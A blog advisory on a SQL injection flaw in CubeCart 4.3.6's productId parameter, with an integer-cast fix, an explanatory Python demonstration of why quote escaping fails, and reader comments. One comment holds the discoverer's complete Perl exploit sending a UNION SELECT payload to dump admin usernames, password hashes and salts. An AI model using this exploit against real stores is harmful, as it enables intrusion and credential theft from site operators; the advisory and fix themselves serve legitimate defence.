Security Information and Review

Collection of security information and review

CubeCart SQL Injection Vulnerability

Author : Admin

A new vulnerability has been reported in CubeCart that allows an attacker to manipulate and inject SQL queries. It is caused by an input validation error in “includes/content/viewProd.inc.php” when processing the productId parameter: the value passed in productId is not properly sanitized before being used in SQL queries. The vulnerability was reported by sangteamtham and is confirmed in version 4.3.6; prior versions may also be affected.

CubeCart is a fully featured ecommerce shopping cart solution used by over a million store owners around the world. CubeCart is an “out of the box” ecommerce shopping cart software solution which has been written to run on servers that have PHP & MySQL support. With CubeCart you can quickly set up a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world.
There are a great deal of powerful features enabling your business to trade online successfully. It is easy to modify the look and feel of your store to match your company’s branding or to sit comfortably beside your existing website thanks to CubeCart’s powerful HTML template system. Our solutions are robust, flexible, affordable and are supported not only by a profitable and stable company but by a thriving community of enthusiasts who are keen to recommend it and share their ideas and experience.

The best fix for this issue is to edit “includes/content/viewProd.inc.php” and cast the productId parameter to an integer before it is used in any SQL query, so that only a number can ever reach the unquoted numeric comparison. The change is shown below.

	<?php

		………………..

		/* Before edit: sanitizeVar() only escapes quotes, which does not protect an unquoted numeric value */
		$_GET['productId'] = sanitizeVar($_GET['productId']);

		/* Replace with the line below: the (int) cast discards everything except a leading integer */
		$_GET['productId'] = (int)sanitizeVar($_GET['productId']);

		……………..

	?>

If editing this file is not an option, the CubeCart vendor has released a patched version: upgrade to CubeCart 4.3.7.
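To make the reasoning behind the fix concrete, here is an added illustration written for this review; it is not CubeCart's code. It models a quote-escaping sanitizer (assumed to behave like CubeCart's mySQLSafe, escaping backslashes and quotes), the PHP (int)/intval() coercion the fix relies on, and the preferred alternative of binding the value as a query parameter. The inventory table and its rows are constructed sample data in an in-memory SQLite database, and the tampered input is constructed to contain no quotes, which is exactly the case an escaping sanitizer cannot help with.

```python
"""Added example (not CubeCart's code): why escaping quotes does not protect an
unquoted numeric SQL parameter, and what integer coercion and bound parameters
do instead. Table contents and inputs are constructed sample data."""
import re
import sqlite3


def mysql_safe(value: str) -> str:
    """Stand-in for a quote-escaping sanitizer (assumption: like CubeCart's
    mySQLSafe, it escapes backslashes and quotes). Such escaping is only
    meaningful inside a quoted string literal; a bare number needs no quotes,
    so a tampered numeric input passes through untouched."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"'))


def php_intval(value: str) -> int:
    """Mimic PHP's (int) cast / intval() on a string: a leading integer
    (optional sign, optional leading whitespace) is kept, anything else
    yields 0. This is the behaviour the (int) fix relies on; note that
    garbage silently becomes product 0, not an error."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def build_query_escaped(product_id: str) -> str:
    """'Before' shape: escaped value concatenated into an unquoted numeric context."""
    return ("SELECT productId, name FROM CubeCart_inventory "
            "WHERE disabled='0' AND productId = " + mysql_safe(product_id))


def build_query_intval(product_id: str) -> str:
    """'After' shape: only the coerced integer is ever concatenated."""
    return ("SELECT productId, name FROM CubeCart_inventory "
            "WHERE disabled='0' AND productId = " + str(php_intval(product_id)))


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample inventory: two visible products and one disabled one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE CubeCart_inventory "
                 "(productId INTEGER, name TEXT, disabled TEXT)")
    conn.executemany("INSERT INTO CubeCart_inventory VALUES (?, ?, ?)",
                     [(1, "Widget", "0"), (2, "Gadget", "0"), (3, "Hidden item", "1")])
    return conn


def fetch_escaped(conn: sqlite3.Connection, product_id: str) -> list:
    """Vulnerable shape: the input can rewrite the WHERE clause."""
    return conn.execute(build_query_escaped(product_id)).fetchall()


def fetch_intval(conn: sqlite3.Connection, product_id: str) -> list:
    """Fixed shape from the article: integer coercion before concatenation."""
    return conn.execute(build_query_intval(product_id)).fetchall()


def fetch_bound(conn: sqlite3.Connection, product_id: str) -> list:
    """Preferred shape: the value travels as a bound parameter, never as SQL text,
    so the query structure is fixed regardless of input."""
    return conn.execute(
        "SELECT productId, name FROM CubeCart_inventory "
        "WHERE disabled='0' AND productId = ?",
        (php_intval(product_id),),
    ).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    tampered = "1 OR 1=1"  # constructed input with no quotes: escaping leaves it intact
    print("escaped value :", mysql_safe(tampered))
    print("escaped query :", fetch_escaped(db, tampered))  # WHERE clause rewritten, all rows
    print("intval query  :", fetch_intval(db, tampered))   # only product 1
    print("bound query   :", fetch_bound(db, tampered))    # only product 1
```

Running the block shows the escaped query returning every row, including the disabled product, because `mysql_safe` found nothing to escape, while both the coerced and the bound versions return only product 1. In a real deployment the bound-parameter form is the one to prefer; the integer cast is the minimal change that fits the existing CubeCart code.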

Categories: Web Application Security
sangteamtham :
Please edit my name, sangteamtham, not Sangte Amtham. Every website made it so wrong.
20 November 09 at 23:10
sangteamtham :
here is my exploit. !usr/bin/perl -w ------------------------------------------------------------------------------------------------------------------- CubeCart 4.3.6 Release Remote SQL injection (lastest version) Author : sangteamtham Email : sangteamtham [at] gmail.com Homepage: hcegroup.net & vnbrain.net Great Thanks To: My Mother Hce group Vnbrain Sovietw0rm ------------------------------------------------------------------------------------------------------------------- Poc: / query database $_GET['productId'] = sanitizeVar($_GET['productId']); >>> that makes Vulnerability $query = "SELECT I.*, C.cat_name, C.cat_father_id FROM ".$glob['dbprefix']."CubeCart_inventory AS I LEFT JOIN ".$glob['dbprefix']."CubeCart_category AS C ON I.cat_id = C.cat_id WHERE I.disabled='0' AND I.productId = ".$db->mySQLSafe($_GET['productId']); $prodArray = $db->select($query); Affected version > = 4.xx ------------------------------------------------------------------------------------------------------------------- Fixing : add intval: $_GET['productId'] = intval(sanitizeVar($_GET['productId'])); ------------------------------------------------------------------------------------------------------------------- # print " [x]===============================================>>\n"; # print " [x] .::www.hcegroup.net::. 
\n"; # print " [x] CubeCart 4.3.6 Release\n"; # print " [x] Remote Command Execution Vulnerability\n"; # print " [x] Affected version: >= CubeCart 4\n"; # print " [x] hcegroup.net & vnbrain.net \n"; # print " [x] Code By Sangteamtham\n"; # print " [x] Found and Code on 17/11/2009\n"; # print " [x] Great Thanks flying To My Mother, Sovietw0rm\n"; # print " [x]===============================================>>\n"; # use LWP::UserAgent; # my $userAgent = LWP::UserAgent->new; # $server=shift; # $id=shift; # unless($server&&$id) { # die "\n[+] Use $0 www.google.com 3\nlink like http://www.google.com/index.php?_a=viewProd&productId=3\n"; # } # chomp($server); # my $vul_file = '/index.php?_a=viewProd&productId='; # my $sql_query = ' And 1=0 Union select group_concat(0x3a3a3a,username,0x3a,password,0x3a,salt,0x3a3a3a) from CubeCart_admin_users#'; # my $all = $vul_file.$id; # print " \n\n"; # print "--------------------START-------------------\r\n"; # print "[*] Start to exploiting...\n\n\n"; # print "[*] Be Patient...\n\n"; # my $url = "http://".$server.$all; # my $ex = $url.$sql_query; # my $Attack= $userAgent->get($ex); # my $content=$Attack->content; # $success=0; # print "[+] User details:\n\n"; # while($content =~ m/:::(.*?):(.*?):(.*?):::/g){ # $success++; # my $username = $1; # my $password = $2; # my $salt = $3; # print "[+]User detail $success:\n"; # print " Username: ".$username."\n"; # print " Password: ".$password."\n"; # print " Password salt: ".$salt."\n"; # } # if($success==0){ # print "[+]cant get admin info\n"; # } # else{ # print "[+] Exploiting successfully\n"; # }
20 November 09 at 23:11
thanks for sharing your exploit. I will learn and try ..
30 November 09 at 11:07
I'm sorry Mr .. I don't know, btw, where do you come from ..? Thailand ..?
30 November 09 at 11:09
wow great information thanks
4 January 10 at 19:53
I am from Vietnam. Nice to talk to you.
8 March 10 at 15:32
I am from Viet Nam.
23 June 10 at 02:55
If you like this post, please leave a message or comment.